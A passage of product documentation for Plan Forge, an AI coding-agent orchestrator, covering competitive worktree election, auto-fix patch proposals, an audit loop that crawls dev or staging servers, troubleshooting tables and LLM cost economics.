Competitive loop flowchart. Start: slice marked competitive. A decision node spawn-worktrees branches to Strategy A (.forge/worktrees/A/) and Strategy B (.forge/worktrees/B/). Both worktrees run a validation gate and then conditionally invoke a reviewer when innerLoop.reviewer.enabled is true. The two reviewer outputs converge on a winner-election decision node. The path labeled gate-pass-plus-best-reviewer-score promotes the winner to the working tree; the path labeled tie-on-gate-and-reviewer drops into a token-cost tie-breaker that feeds back into winner. Winner flows through clean-up of losing worktrees to slice-committed. A dotted secondary path connects gate-failure on either strategy to an auto-fix-proposal decision node, which routes small local diffs to .forge/proposed-fixes/*.patch and complex failures to a postmortem record. — Competitive worktree lifecycle, spawn, gate, reviewer, winner election, plus the auto-fix branch on gate failure.

Winner election rules

Election is deterministic. The orchestrator walks the rules in order and stops at the first one that produces a unique winner.

Gate result. Strategies whose validation gate failed are eliminated first. If only one strategy passes, it wins.
Reviewer score. If innerLoop.reviewer.enabled is true, the highest reviewer score among remaining strategies wins.
Token-cost tie-breaker. If reviewer is off or the top score is tied, the lowest total token cost wins. This keeps the loop cost-sensitive even under competitive execution.
Deterministic fallback. On a true tie across all three, the orchestrator picks the lexicographically first strategy name so reruns elect the same winner.

Auto-fix patch proposals

When a slice's validation gate fails and the trajectory suggests a small local correction (single file, under a few hundred lines of diff), the orchestrator drafts a patch file instead of retrying blindly.

Patches are written to .forge/proposed-fixes/<fixId>.patch with metadata in .forge/fix-proposals.json.
Nothing is applied automatically. The operator (or a reviewer agent) must invoke applyFixProposal; the patch is git-apply-style so rollbackFixProposal can undo it cleanly.
To allow the orchestrator to apply patches itself on gate-fail retries, set innerLoop.autoFix.applyWithoutReview: true. This is off by default for a reason, review the patch first.

Cost-anomaly detection

Every slice's total token cost is compared against the rolling per-model median (default window: 20 runs). Ratios above innerLoop.costAnomaly.ratio (default 2.0) are logged to .forge/cost-anomalies.jsonl and surfaced in the Dashboard's Inner Loop tab.

Detection is advisory: anomalies never halt a run. The signal is there so you can investigate why a slice drifted, stale prompts, model degradation, a gate that's suddenly looping, before it shows up as a surprise on the month's bill.

Configuration summary

All three subsystems live under a single innerLoop key in .forge.json. New installs receive these defaults via the v2.58 best-defaults preset; existing projects opt in per-subsystem.

{
  "innerLoop": {
    "competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
    "autoFix":     { "enabled": true, "applyWithoutReview": false },
    "costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
  }
}

See also: The Inner Loop covers the seven Phase-25 subsystems this chapter builds on. The Dashboard Inner Loop tab shows live state for all ten subsystems in one place.

Bronze funnel with glowing amber findings flowing in from above and being routed to three output channels that loop back to the top, the closed-loop audit drain

Deep Dive · Act II, Forge

Audit Loop

Closed-loop bug discovery: content-audit scan → triage → fix, iterating until convergence or max rounds.

New here? Read this first. The audit loop is Plan Forge's way of finding bugs in a running app and fixing them automatically. Point it at your dev or staging server and it will:

Scan, visit every page/route and record what's broken (404s, blank pages, “Coming soon” placeholders, broken links).
Triage, sort each finding into one of three lanes: fix it now, ask a human, or I'm not sure.
Fix, for the “fix it now” lane, spawn a worker to apply the fix, then re-scan.
Repeat, keep going until no new bugs appear (“convergence”) or the round limit hits.

It works like a tireless QA tester that not only files bugs but closes them. It's off by default, you have to opt in. Production is permanently off-limits.

Audit loop drain flow: content-audit scanner produces findings, forge_triage_route classifies each into one of three lanes (bug -> forge_bug_register, spec -> forge_crucible_submit, classifier -> .forge/audits/ artifact), then spawnWorker applies fixes and the loop iterates. Activation via .forge.json#audit.mode (default off). Production environments are hard-blocked.

Off by default. The audit loop defaults to off. It never runs automatically unless you explicitly set audit.mode to "auto" or "always" in .forge.json. Production environments are always forbidden.

What It Does

The audit loop is a first-class Tempering subsystem that discovers bugs from a running system. It probes live routes against a dev or staging server, triages the findings into actionable lanes, and iterates until the finding count converges (no new issues found) or the maximum round limit is reached.

The Three Components

1. Content-Audit Scanner

pforge-mcp/tempering/scanners/content-audit.mjs, HTTP-probes a set of routes against a live base URL and emits structured findings: HTTP status, page title, h1, word count, placeholder markers, and client-shell detection for hydrated SPAs.

Production guard: Reuses looksLikeProduction() from ui-playwright.mjs. Refuses to crawl production URLs unless allowProduction: true is explicitly set (and forbidProduction in config is immutably true).
Injectable fetcher: Tests use a mock fetcher, no real HTTP in the test suite.

2. Triage Router

pforge-mcp/tempering/triage.mjs, routeFinding(finding, classifier) routes each finding to one of three lanes:

Lane	Destination	What happens
`"bug"`	Bug Registry	Finding registered via `forge_bug_register`
`"spec"`	Crucible	Finding submitted as a new smelt (feature gap)
`"classifier"`	Local artifact	Proposal written to `.forge/audits/` for human review

Unknown classifier output falls safe to { lane: "bug", confidence: "low" }, findings are never dropped.

3. Drain Loop

pforge-mcp/tempering/drain.mjs, runTemperingDrain(opts) orchestrates the full cycle:

Run all registered scanners (content-audit + any others)
Triage each finding through routeFinding()
Apply fixes for bug-lane findings (via injectable spawnWorker)
Re-scan to check if fixes resolved the issues
Repeat until convergence or maxRounds (default 5)

Activation Surface

Configuration lives in .forge.json#audit:

{
  "audit": {
    "mode": "off",
    "maxRounds": 5,
    "autoThresholds": {
      "minFilesChanged": 5,
      "minDaysSinceLastDrain": 3,
      "requireFindings": true
    },
    "environments": ["dev", "staging"],
    "forbidProduction": true
  }
}

Mode	Behavior
`"off"` (default)	No automatic drain. Manual only via `pforge audit-loop`.
`"auto"`	Evaluates thresholds after plan completion. Fires only if change-surface signals trip.
`"always"`	Dispatches unconditionally after every plan completion.

CLI Usage

# Manual one-shot (ignores config, always runs)
pforge audit-loop

# Respect .forge.json#audit config
pforge audit-loop --auto

# Dry run with custom rounds
pforge audit-loop --dry-run --max=3

# Target staging
pforge audit-loop --env=staging

MCP Tools

forge_tempering_drain, programmatic drain loop access. Accepts project, maxRounds, scanners, dryRun, env.
forge_triage_route, route a single finding through the classifier. Returns { lane, payload, confidence }.

Dashboard

The audit-loop toggle in the dashboard persists to .forge.json#audit, not session-scoped. This matches the pattern used by Forge-Master prefs (.forge/fm-prefs.json) and the quorum advisory toggle.

Discovery Harness Implementation

The discovery harness is the engine that turns a running dev server into a stream of structured findings. It uses a 4-pass build sequence, crawl, wrap, execute, auto-smelt, to close the loop between bug discovery and bug resolution with no human triage required.

Discovery Harness 4-pass build sequence: Pass 1 (Harness) crawls routes with Node + Playwright, Pass 2 (Wrapper) transforms JSON into Crucible smelts, Pass 3 (Execute) runs slices with Tempering, Pass 4 (Auto-smelt) converts failures into new smelts — Discovery Harness 4-pass build sequence

Pass 1 — Harness (Node + Playwright)

A headless Playwright browser crawls every route exposed by the dev server. For each page the harness records HTTP status, document title, h1 text, word count, placeholder markers (e.g. Coming soon, TODO), broken links, and client-shell detection for hydrated SPAs. Results are written as structured JSON to .forge/audits/.

Representative example: a marketing site with 47 routes produces 12 findings on its first pass, three placeholder headings, two broken anchor links, four pages returning non-200 status codes, and three pages with zero meaningful content.

Pass 2 — Wrapper (JSON → Crucible)

Each finding from Pass 1 is transformed into a Crucible smelt via forge_crucible_submit. The wrapper applies severity triage, routing findings through the three-lane classifier (bug, spec, classifier) before packaging them as structured smelt input with enough context for the hardener to produce actionable plan slices.

Pass 3 — Execute (Slices + Tempering)

The hardened plan runs slice-by-slice through forge_run_plan. Each slice carries its own validation gate and Tempering re-audit. LiveGuard hooks fire between slices, catching regressions before they compound.

Pass 4 — Auto-smelt (Closed Loop)

Any Tempering failures from Pass 3 are converted into new smelts via forge_tempering_drain and re-entered into the bug registry, no human triage required. The loop iterates until convergence (zero new findings) or the configured maxRounds limit (default 5) is reached.

Further reading. For a real-world walkthrough of the 4-pass sequence applied to a production Next.js site, see the blog post The Loop That Never Ends.

Three-Lane Triage Funnel

Every finding from the discovery harness gets sorted into one of three lanes by the wrapper before reaching Crucible. Lane assignment determines whether a human ever sees the finding, what shape the resulting plan slice takes, and how the loop closes. The funnel is the difference between an audit that produces 100 PRs nobody reads and an audit that produces 5 PRs that ship.

Bug Lane — Auto-smelt to Bug Registry

Findings with high confidence and a clear remediation pattern (broken links, non-200 status codes, placeholder markers, hydration failures) drop into the bug lane. The wrapper packages them as Crucible smelts with severity attached, then the auto-smelt pass converts them into entries in the bug registry. No human triage required, the loop closes automatically.

Representative example: a 4-pass run finds 8 broken anchor links across the docs. All 8 land in the bug lane as a single batch smelt with severity medium, generate one plan slice that fixes them together, and close themselves out via tempering re-audit.

Spec Lane — Escalate to Human Spec Author

Findings that imply missing or ambiguous spec content (placeholder headings like "Coming soon," pages with zero meaningful content, hydrated SPAs that crash without JS) drop into the spec lane. These can't be auto-fixed because the harness doesn't know what content should be there, only that something is missing. The wrapper escalates them as Crucible smelts requiring human input before they can be hardened into plan slices.

Representative example: the harness finds a route titled "Pricing, Coming soon" with 12 words of body content. Spec lane escalates this to a human as a Crucible smelt requesting a draft of the actual pricing tier copy. The human responds in the Crucible interview funnel, the wrapper hardens the response into a plan slice, and the loop resumes.

Classifier Lane — Refine the Classifier

Findings the classifier can't confidently sort (novel signals, contradictory evidence, low confidence scores) drop into the classifier lane. Rather than guess, the wrapper records the finding plus the classifier's confusion signal as a Crucible smelt targeting the classifier itself. Over time, classifier-lane volume should drop as the classifier learns from each handoff.

Representative example: the harness finds a 200 OK route with full content but the document title is just ".", the classifier hasn't seen this signal before. Classifier lane creates a smelt asking the maintainer "should pages with single-character titles be flagged as defective?" The answer becomes a new classifier rule for the next run.

Finding-type to lane mapping

Finding type	Default lane	Why
Non-200 HTTP status	Bug	Unambiguous failure, fix is mechanical
Broken anchor / link	Bug	Target either exists or it doesn't; trivial to verify
Placeholder marker (TODO, Coming soon)	Spec	Implies missing content, not broken content
Zero meaningful content	Spec	Page exists but says nothing, needs human authoring
Hydration failure (SPA crashes without JS)	Bug	Build / config defect, not a content gap
Novel signal / low confidence	Classifier	Classifier can't sort; ask the maintainer
Mixed signals (multiple conflicting findings)	Classifier	Pre-empt a wrong auto-smelt by asking first

What gets auto-smelted. Only the bug lane runs autonomously. Spec and classifier lanes always require a human in the loop, by design. The point of the funnel is to keep humans focused on what only humans can answer (intent, scope, novel signals), not on triaging mechanical defects the harness already understands.

For a worked example of how the bug lane closes a real defect end-to-end, including the multi-model quality patterns that catch issues a single model misses, see Quorum Quality Examples in Chapter 14.

Design Decisions

Classifier proposals are local files: Written to .forge/audits/ as JSON artifacts. GitHub PR creation is a deferred enhancement.
spawnWorker is injectable: Consistent with visual-diff quorum and bug classifier patterns. Already in the function signature.
Production is immutably forbidden: forbidProduction: true cannot be overridden via config, it's hardcoded in auto-activate.mjs.

← The Competitive Loop What Is LiveGuard? →

A dimly lit bronze workshop diagnostic bench at night with an open ledger, an oil-lit brass lantern overhead, and a magnifying loupe held in a mechanical iron arm focusing a beam of amber light onto a glowing ERR rune, floating diagnostic glyphs (wrench, checkmark, gear, question-mark) orbit the workshop

Chapter 15

Troubleshooting

"Something's wrong." Find the answer fast.

Every tool breaks eventually. The question is whether you have a diagnostic path or just a prayer. Start with pforge smith, it catches 80% of issues in 5 seconds.

Key terms: Glossary defines every Plan Forge term. If you see "scope contract," "validation gate," "slice," or "applyTo" and aren't sure what they mean, check there first.

Trying to do something, not fix something? This chapter answers "why is X broken?" If the question is "how do I X?", for example "how do I lower the cost of a run" or "how do I add a custom skill", jump to Appendix S — How Do I…? Task Index. It maps verbs to chapters.

Diagnostic Tools

Troubleshooting decision tree: start with pforge smith, branch to execution, guardrails, dashboard, or setup issues — Figure 15-1. Troubleshooting decision tree

Tool	What It Checks	When to Use
`pforge smith`	Environment, VS Code config, setup health, version	First thing when anything seems off
`pforge check`	Setup file existence and validity	After setup or update
`forge_diagnose({ file })` (MCP tool)	Multi-model bug investigation on a specific file	When a slice fails and you can't see why, invoke from Copilot Chat

What a healthy `pforge smith` looks like

If you've never run it, here's the shape of the output to compare against. Anything red or marked FAIL is a real problem; WARN usually means an optional extension or integration isn't installed.

Terminal, expected output

$ pforge smith

Plan Forge v3.12.0, forge diagnostic

Environment
  OS                Windows 10.0.22631  OK
  Shell             PowerShell 7.4.1    OK
  Node              v20.11.0            OK  (≥ 20 required)
  Git               2.42.0              OK  (≥ 2.30 required)

Forge layout
  .github/prompts            22 files   OK
  .github/instructions       22 files   OK
  .github/agents             14 files   OK
  .github/hooks               7 files   OK
  .github/skills             12 files   OK
  docs/plans                  5 files   OK
  .forge/config.json         present    OK

MCP server
  pforge-mcp/server.mjs      present    OK
  Port 3100                  free       OK
  Port 3101 (WS hub)         free       OK

Agent adapters
  copilot   .vscode/mcp.json  OK
  claude    .mcp.json         not installed   WARN (run setup with --agent claude)
  cursor    .cursor/mcp.json  not installed   WARN
  codex     .codex/mcp.json   not installed   WARN

Result: 15 OK, 3 WARN, 0 FAIL ,  forge is healthy

Read it from the bottom. The Result: line is the headline. If FAIL = 0 you're fine to keep working. WARNs are reminders, not blockers.

Agent Isn't Following Guardrails

Symptom	Cause	Fix
AI ignores coding standards	Instruction files not loading	Check `applyTo` pattern matches the file you're editing. Run `pforge smith` to verify file counts.
Wrong instructions loading	`applyTo` glob too broad	Narrow the pattern, use `/auth/` instead of `**`
Guardrails load but AI ignores them	Context budget exceeded	Reduce `copilot-instructions.md` to <80 lines. Remove `applyTo: '**'` from non-essential files.
Project Principles not enforced	`PROJECT-PRINCIPLES.md` missing	Run the project-principles prompt. The instruction file activates only when this file exists.

Plan Execution Fails

Symptom	Cause	Fix
Gate fails with build errors	Code doesn't compile	Fix the build error, then `pforge run-plan --resume-from N`
Gate fails, tests regress	New code broke existing tests	Fix the regression. Check if scope contract is too broad.
Slice times out	Context window exhausted or model overloaded	Split the slice into smaller chunks. Try a different `--model`.
Model returns error	API key invalid or rate limited	Check `XAI_API_KEY` / `OPENAI_API_KEY` env vars. Wait for rate limit reset.
Scope violation detected	AI touched forbidden files	The PreToolUse hook should catch this. If not, tighten the Scope Contract.
Escalation exhausted	All models in chain failed	Review the slice, it may be too complex. Break into sub-slices or simplify gates.

Dashboard Won't Load

Symptom	Cause	Fix
Connection refused on :3100	Server not running	`node pforge-mcp/server.mjs`
Port already in use	Another process on 3100	`node pforge-mcp/server.mjs --port 4100` or kill the conflicting process
Blank page loads	Missing `node_modules`	`cd pforge-mcp && npm install`
WebSocket disconnects	Firewall or proxy blocking :3101	Allow port 3101, or set `WS_PORT` env var
No data in Runs/Cost tabs	No execution history yet	Run a plan first: `pforge run-plan`

Setup Failed

Symptom	Cause	Fix
"Preset not found"	Typo in preset name	Valid presets: dotnet, typescript, python, java, go, swift, rust, php, azure-iac
Permission denied	Read-only directory or no git access	Check file permissions. Run from a writable directory.
Existing files conflict	Previous setup exists	Use `-Force` flag to overwrite, or `pforge update` for selective updates
Wrong files installed	Incorrect preset for your stack	Re-run: `.\setup.ps1 -Preset <correct-preset> -Force`

Costs Are Too High

Strategy	Savings	How
Use cheaper execution model	50–70%	Set `modelRouting.execute` to a smaller model
Reserve expensive model for review	30–50%	`modelRouting.review: "claude-opus-4.6"`
Raise quorum threshold	20–40%	`--quorum-threshold 8` (fewer slices trigger consensus, see scoring rubric)
Reduce context per slice	10–20%	Use targeted `Context:` lists (see Chapter 4)
Preview before running	N/A	`pforge run-plan --estimate` or `forge_estimate_quorum` (compares all four modes)

Grok Image Generation Crashes Session

xAI Grok Aurora returns JPEG bytes regardless of requested format. If raw bytes with wrong MIME type enter the conversation history, the session becomes unrecoverable.

Current mitigations: The MCP tool returns text-only responses (file path + metadata, never raw base64). The generateImage() function detects actual format via magic bytes and converts using sharp. Sessions should be safe, but if you encounter the MIME mismatch error, start a fresh session.

Safe workflow: Use .jpg extensions (matches Grok's native output), generate art in dedicated sessions, or use the REST API: POST /api/image/generate.

Common Error Messages

Looking for the contract, not the fix? Every exit code, MCP error code, and REST status Plan Forge emits is documented in Appendix X — Errors & Exit Codes. This table maps symptom → fix; the appendix maps code → meaning.

Error	Cause	Fix
`No .forge.json found`	Not in a Plan Forge project	Run `pforge init` or `setup.ps1`
`templateVersion mismatch`	Framework files outdated	`pforge update`
`No API key configured`	Missing env var for image/analysis	Set `XAI_API_KEY` or `OPENAI_API_KEY`
`Plan parsing failed`	Malformed plan file	Check for missing `## Execution Slices` section or broken markdown
`Gate command failed (exit 1)`	Build or test failure	Fix the code, then `--resume-from N`
`DRIFT DETECTED`	Forbidden file modified	Revert the forbidden change, re-run the slice
`CRITICAL_FIELDS_MISSING` v2.82.1	Crucible finalize blocked, missing build-command, test-command, scope, gates, forbidden-actions, or rollback	Call `forge_crucible_preview` for `criticalGaps[]`, then continue the interview
`PLAN_ALREADY_EXISTS` v2.82.1	Crucible finalize refuses to overwrite hand-authored `docs/plans/Phase-NN.md`	Read both files (existing plan + `.crucible-draft.md`), then re-finalize with `overwrite: true` if you really mean it
`ASK_QUESTION_MISMATCH` v2.82.1	Client passed a stale `questionId` to `forge_crucible_ask`	Re-fetch state via `forge_crucible_preview`, retry with the current question id
`QUORUM_ALL_FAILED` v2.78	All quorum models timed out (60s each) or errored	Check API keys / network; retry. Consider `--quorum=speed` if flagship models are unavailable. Multi-agent quorum reference.
`NO_REASONING_MODEL`	Forge-Master has no model configured and no API key found	`gh auth login` for zero-key path, or set `ANTHROPIC_API_KEY` / `OPENAI_API_KEY` / `XAI_API_KEY`, or set `forgeMaster.reasoningModel`
Subprocess `STATUS_CONTROL_C_EXIT (0xC000013A)` v2.81	Worker process was killed by signal mid-slice	Slice is now correctly marked failed (not silently passed). Check `statusReason`, then `--resume-from N`
`slice-orphan-warning` event v2.82.1	Failed slice's worker deliverables were staged but not committed	See `.forge/runs/<runId>/orphans-slice-<N>.json` for copy-paste recovery commands

Crucible Finalize Fails v2.82.1+

The Crucible critical-fields gate refuses to draft TBD-laden plans. If finalize keeps returning CRITICAL_FIELDS_MISSING, the recovery path is:

forge_crucible_preview { id }, returns criticalGaps: [{ field, reason, hint }, …]
For each gap, the next call to forge_crucible_ask queues a question that targets that field
Build/test command questions auto-fill suggestions via inferRepoCommands, usually you just confirm
Once all gaps resolved, finalize succeeds

If the gate is blocking on something you genuinely don't need (rare, the gate exists for good reason), the escape hatch is --manual-import on a hand-authored plan. See Chapter 5 — Enforcement Gate.

Forge-Master Misroutes Intent

Forge-Master classifies prompts into operational, troubleshoot, build, advisory, or offtopic. Misroutes happen most often when:

Stage 1 keyword scorer didn't match, check the via field in the response. If "keyword", try a more keyword-rich phrasing ("status of …", "why did … fail", "should we …")
Embedding cache is cold, new project, no prior classifications. Hit rate climbs after 10–20 turns. Check GET /api/forge-master/cache-stats
Router model is too small, default grok-3-mini is fine for most prompts but quirky vocabulary may need grok-4 or gpt-4o-mini. Override via forgeMaster.routerModel in .forge.json
Quorum advisory not firing on "auto", requires lane=advisory + autoEscalated=true + fromTier=high + confidence≥medium. Use "always" to remove gating during testing

See Forge-Master chapter — Troubleshooting for the full list.

Host-Aware Routing Confusion v2.82+

Host-aware routing detects which IDE / CLI host you're running Plan Forge from (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, bare terminal) so you don't silently double-pay against your non-Copilot subscription when calling gpt-* models. If you're seeing surprising routing behavior:

Symptom	What's happening	Override
"My `gpt-*` calls cost more on Claude Code than VS Code"	Default `auto` mode prefers direct OpenAI API on non-Copilot hosts (honors your subscription)	Set `routing.hostPreference: "gh-copilot"` in `.forge.json` to force Copilot subscription billing
"Quorum dropped `gpt-*` from the run"	You're on a non-Copilot host AND `OPENAI_API_KEY` is unset AND `routing.hostPreference` is `"drop"`	Set the API key, or change preference to `"auto"` / `"gh-copilot"`
"Quorum pre-run summary table shows different billing per model"	Working as intended, the new table shows host + per-model billing surface so you can see spend distribution before dispatch	None, this is a feature, not a bug

Errors & Exit Codes

If a script needs to react to a Plan Forge failure programmatically, branch on the exit code (CLI / orchestrator) or the named error code (MCP tools / REST). These are stable across releases, new failure modes get new codes rather than reusing existing ones.

Layer	Returns	Branch on
`pforge` CLI	POSIX exit code	`0` success · `1` generic failure · `2` environment refusal (not in git repo, update-check failed, audit had no scanners)
`pforge run-plan`	Exit code + `statusReason` in JSON	`0`=completed / completed-with-warnings · `1`=failed / aborted. `statusReason` narrows it: `gate-failed`, `drift-detected`, `quorum-all-failed`, etc.
MCP tools (`forge_*`)	`{ ok, code, error }` envelope	`ok: false` with a named `code`, e.g. `NO_API_KEY`, `CRITICAL_FIELDS_MISSING`, `QUORUM_ALL_FAILED`, `PLAN_NOT_FOUND`
REST (`POST /api/…`)	HTTP status + JSON body	`400` bad body · `404` missing · `409` state conflict (`ERR_UPDATE_DURING_RUN`) · `429` rate limited (use `retryAfterMs`) · `500` internal
OS subprocess (worker, gate)	Native exit code, surfaced via `statusReason`	`0xC000013A` Windows Ctrl+C · `130/137/143` POSIX signals. Mapped to `worker-signaled`.

Full contract: every exit code, every named error code, every error event, plus copy-paste Bash and PowerShell CI recipes, see Appendix X — Errors & Exit Codes.

Subsystem catalog: Appendix Z — Failure-Mode Catalog complements this chapter. Where troubleshooting is symptom-driven (you see a red output and look up what it means), Appendix Z is subsystem-organised — browse by gate, quorum, watcher, OpenBrain, snapshot, model-pool, or hub to see every known failure mode with its symptom, cause, and fix triple.

Getting Help

GitHub Issues: github.com/srnichols/plan-forge/issues
Contributing: View contributing guide on GitHub for PR guidelines
Security: View security policy on GitHub for vulnerability reporting

📄 Full reference: FAQ, Multi-Agent Setup — GitHub Copilot

A glowing brass balance scale on the workbench at the Plan Forge shop, one pan stacked with gold coins and a softly glowing amber ingot, the other pan balanced with a small parchment receipt and a tiny finished iron piece, a wooden abacus and an open leather ledger book to the side

Act II, Forge · Chapter 31

Cost & Economics

How Plan Forge prices LLM calls, where token costs come from, the three sources of truth, per-quorum-mode economics, cost-effective workflow patterns, and the anti-lock-in commitments that keep your provider bill yours, never marked up, never proxied, never withheld.

Never hand-compute quorum costs in chat. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude. Always call forge_estimate_quorum for projections and forge_cost_report for actuals. If you're a UI building a quorum picker, populate it from forge_estimate_quorum, do not invent dollar amounts.

Orientation

Plan Forge has no Plan Forge bill. It has your provider bill, plus the orchestrator's bookkeeping to tell you what fraction of that bill belongs to which slice, which plan, and which model. Three things follow from that:

Bring-your-own-key. Plan Forge calls Anthropic, OpenAI, Google, and xAI directly using your keys. There is no relay, no proxy, no aggregator endpoint. (Azure OpenAI is also supported, same direct call, your AOAI deployment.)
No markup. The orchestrator records what the provider charged you. Plan Forge adds zero margin. The numbers in forge_cost_report are the numbers on your provider invoice.
Per-slice attribution. Every LLM call is tagged with the run id, slice number, role (worker / reviewer / quorum responder / forge-master / etc.), and provider. You can answer "which slice cost the most" from the audit trail, not from guessing.

Three sources of truth

Cost numbers in Plan Forge come from exactly three places. Knowing which is which prevents the common confusion between "what a slice will cost" and "what it did cost."

Source	Answers	How to read it
`MODEL_PRICING` table pforge-mcp/cost-service.mjs	"What does a given model charge per million input / output / cache tokens?"	Static table, updated when providers publish new prices. Each entry cites its `_source` URL with date. Cache, flex, priority, and AOAI deployment multipliers are encoded alongside the base rates.
`forge_estimate_quorum` · `forge_estimate_slice`	"What will this plan / slice cost before I run it?"	Token-aware projections. Walks each slice, projects worker tokens by file size + scope, projects quorum panel by mode. Returns four-mode breakdown (auto / power / speed / disabled) for plans.
`forge_cost_report`	"What did Plan Forge actually charge to my providers?"	Aggregates `.forge/cost-history.json`, one record per LLM call with run id, slice, role, model, tokens, ticks (xAI exact-cost), and dollar amount. Roll up by day / month / model / role.

Why three? The pricing table is the contract (rates per token), the estimate tools are the forecast (rates × projected tokens), and the cost report is the actual (rates × observed tokens with cache hits, retries, and provider rounding folded in). Estimates and actuals will differ, the cost report is always authoritative.

Cost drivers

The variables that move your bill, ranked roughly by how much leverage they have.

Driver	Range	How to manage it
Model tier	~50× spread between flagship and nano (`claude-opus-4.7` $5/$25 vs `gpt-5-nano` $0.05/$0.40 per 1M tokens)	Use cheaper models for code-search / classification / routing. Reserve flagships for hard reasoning slices. The `auto` quorum mode does this automatically.
Token volume per slice	1K (small CRUD) to 200K (large refactor with broad context)	Tighten scope contracts. A slice that touches 4 files costs ~10× less than one that touches 40, even with the same logic. Split fat slices.
Quorum panel size	1 model (disabled) to 5+ models (power mode)	Use `auto` by default; opt into `power` only for high-stakes or low-confidence decisions. See per-quorum-mode economics.
Cache reuse	1.0× (no cache) down to 0.10× (Anthropic / OpenAI cache read)	Plan Forge prompts the same system blocks across slices in a run, which providers cache. No action needed, just don't restart the run between slices unnecessarily.
Reasoning tokens (o-series, GPT-5 reasoning)	Often 5–20× visible output	Reasoning tokens are billed at the output rate and already counted in `output_tokens`, don't double-count when estimating. Use reasoning models only when the slice needs them.
Retries & escalation	1× (clean pass) to 3–5× (full escalation chain)	Tighten validation gates so first-pass success rate climbs. The Inner Loop's reviewer calibration is designed for this, see Chapter 14 deep dive — The Inner Loop.
AOAI deployment type	1.0× (global / provisioned) to 1.1× (data-zone / regional)	Use global Azure OpenAI deployments unless data-residency requires otherwise. The 10% uplift is encoded in `aoai_deployment_type_multiplier`.
Priority / flex tier (GPT-5.x)	0.5× (flex) to 2.0× input / 1.5× output (priority)	Flex is fine for batch / offline runs; priority is rarely worth it for plan execution. Default tier is standard.

Estimate vs actuals

Before running a plan, get a projection. After running, audit the actual.

Before the run: `forge_estimate_quorum`

// MCP
forge_estimate_quorum({ plan: "docs/plans/Phase-NN.md" })

// REST
POST /api/tool/forge_estimate_quorum
{ "plan": "docs/plans/Phase-NN.md" }

// CLI
pforge run-plan --estimate docs/plans/Phase-NN.md

Returns a per-slice token projection plus four-mode totals:

{
  "plan": "Phase-NN",
  "slices": [
    { "n": 1, "name": "Add user_profiles table", "projectedTokens": 8400, "modelTier": "mid", … },
    …
  ],
  "modes": {
    "auto":     { "totalUsd": 0.42, "breakdown": { /* per-model */ } },
    "power":    { "totalUsd": 1.85, "breakdown": { /* per-model */ } },
    "speed":    { "totalUsd": 0.18, "breakdown": { /* per-model */ } },
    "disabled": { "totalUsd": 0.09, "breakdown": { /* per-model */ } }
  }
}

The picker UI in the dashboard uses exactly this payload. If you're building your own UI, populate it the same way, the four-mode table is the single source of truth for "what does this cost?"

After the run: `forge_cost_report`

// MCP
forge_cost_report({ runId: "run-2026-05-18-091234" })   // one run
forge_cost_report({ scope: "month" })                    // current month
forge_cost_report({ scope: "month", groupBy: "model" })  // monthly by model

// REST
GET /api/cost/report?runId=…
GET /api/cost/report?scope=month&groupBy=model

Returns the actual provider-billable amounts pulled from .forge/cost-history.json. Group by model, role, day, or slice. For runs that included xAI calls, the dollar amounts use the provider's exact-cost ticks (1 tick = $1×10^-10) rather than multiplier math, what you see is what xAI billed.

Per-quorum-mode economics

Quorum mode is the biggest single cost lever after model tier. Plan Forge ships four modes:

Mode	Panel	Threshold	Cost shape	When
`auto` (default)	Dynamic: 2–3 models picked by intent class	Majority of responders	~3× single-model	Most plans. Cost-effective and adequate for most decisions.
`power`	4–5 flagship models (Opus, GPT-5.5, Gemini Pro, Grok 4.x)	5	~8–12× single-model	Architectural decisions, plan hardening (Session 1), high-stakes refactors.
`speed`	4–7 fast / cheap models (mini / nano tier)	7	~1.5–3× single-model	High-volume CI runs, batch classifications, when latency > depth.
`disabled` (`--no-quorum`)	1 model	n/a	1× (baseline)	Solo dev, trivial slices, dev-loop iteration.

Picker UIs MUST be tool-backed. If you're showing a quorum mode chooser with dollar amounts, those numbers come from forge_estimate_quorum, never from chat math. The ratios above are approximate and shift with model availability; the tool always returns current numbers.

Cost-effective workflows

Patterns that have been observed to reduce spend without hurting outcomes.

Right-size slices

A slice that costs $0.50 to succeed is dramatically cheaper than one that costs $3 to fail and $2 to retry. The smaller the slice, the higher the first-pass success rate, the lower the total cost. The Crucible's plan-hardening pass (Session 1) is designed to split slices that are too fat, trust it. Target: 1–4 files per slice, 1 conceptual change per slice.

Let auto-quorum route models

The auto mode classifies each slice into "search-like" / "transform-like" / "reason-like" and routes to a model tier accordingly. Hardcoding a flagship via --model often costs 10× more for no measurable quality gain on routine slices.

Tighten validation gates

Loose gates pass bad work; bad work triggers retries; retries cost money. Strict, fast-to-execute gates (the Inner Loop, reviewer calibration target ~90–95% precision) catch failures on the first attempt and avoid the retry tax. The Inner Loop's forge_validate and forge_sweep are designed for exactly this trade.

Don't fight the cache

Provider caches give 10× savings on cached input. Plan Forge structures prompts so the system block, scope contract, and slice instructions are stable across slices in a run, providers cache the prefix automatically. Restarting the orchestrator between slices throws this away. Run plans end-to-end when you can.

Quorum only when it matters

power mode at the wrong moment is the most common over-spend. Reserve it for: plan hardening (Session 1), architectural decisions, slices flagged with high blast radius. Routine execution, even of moderately complex slices, works fine on auto or disabled.

Anti-lock-in posture

Plan Forge's economic story is your bill stays yours. Concretely:

Commitment	What it means
BYOK across providers	Anthropic, OpenAI, Google, xAI, Azure OpenAI, same code path, your keys. Switch providers by changing env vars; no migration tool needed.
No proxy layer	The orchestrator calls the provider's public API directly. There is no Plan Forge endpoint in the data path. Outage isolation: Plan Forge can't take you down, only your provider can.
No usage telemetry	Plan Forge does not phone home with your token counts. The cost history lives in `.forge/cost-history.json` on your machine and stays there unless you explicitly export it.
Symmetric provider treatment	Adding a new provider takes ~30 lines in `pforge-mcp/cost-service.mjs` + a route adapter. No provider is privileged; the pricing table is open-source.
Open-source pricing table	`MODEL_PRICING` is in the repo with `_source` URLs. If you don't believe a rate, click the source. If a rate is wrong, file a PR.
Easy export	`forge_cost_report` exports JSON or CSV. Your run history is portable to any BI tool. No data lock-in.
Skill / plan files are portable	SKILL.md and plan markdown are vendor-neutral text. Moving to a different agent runtime (Claude Code, Cursor, raw API scripts) preserves your investment.

Forecasting at scale

For teams or CI use, forge_cost_report aggregates roll up cleanly. Group by the dimension you want to forecast against and feed the result into your spreadsheet, BI tool, or dashboard of choice:

# Monthly spend by model
